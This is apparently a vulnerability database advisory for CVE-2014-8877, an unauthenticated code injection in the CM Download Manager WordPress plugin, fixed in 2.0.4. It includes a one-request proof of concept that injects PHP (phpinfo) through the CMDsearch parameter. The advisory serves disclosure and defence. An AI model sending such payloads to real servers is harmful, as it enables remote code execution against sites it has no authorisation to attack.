WordPress Plugin Vulnerabilities

CM Download Manager < 2.0.4 - Unauthenticated Code Injection

Description

The plugin does not validate and sanitise the CMDsearch parameter which used to create a custom function. This allows attacker to run arbitrary command on the remote server

Proof of Concept

GET /cmdownloads/?CMDsearch=".phpinfo()." HTTP/1.1
Host: example.com
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive

Affects Plugins

Plugin icon
cm-download-manager
Fixed in 2.0.4

References

CVE
CVE-2014-8877
Exploitdb
35324
URL
https://packetstormsecurity.com/files/#129183/
URL
https://downloadsmanager.cminds.com/release-notes/

Classification

Type
RCE
OWASP top 10
A1: Injection
CWE
CWE-94
CVSS
10.0 (critical)

Miscellaneous

Submitter
ethicalhack3r
Submitter twitter
ethicalhack3r
Verified
No
WPVDB ID
7f4182ab-93bf-4766-b27c-9bd6217d2a20

Timeline

Publicly Published
2014-11-20 (about 9 years ago)
Added
2014-11-20 (about 9 years ago)
Last Updated
2020-10-22 (about 3 years ago)

Other

Published
Title
Published
2015-04-02
Title
SimpleCart - File Upload & Execution
Published
2023-11-21
Title
WP All Export (Free < 1.4.0, Pro < 1.8.6) - Admin+ RCE
Published
2021-06-21
Title
Include Me <= 1.2.1 - Authenticated Remote Code Execution (RCE) via LFI log poisoning
Published
2023-10-12
Title
Nexter Extension < 2.0.4 - Authenticated(Editor+) Remote Code Execution via metabox
Published
2023-11-24
Title
Vrm 360 3D Model Viewer <= 1.2.1 - Contributor+ Arbitrary File Upload Leading to RCE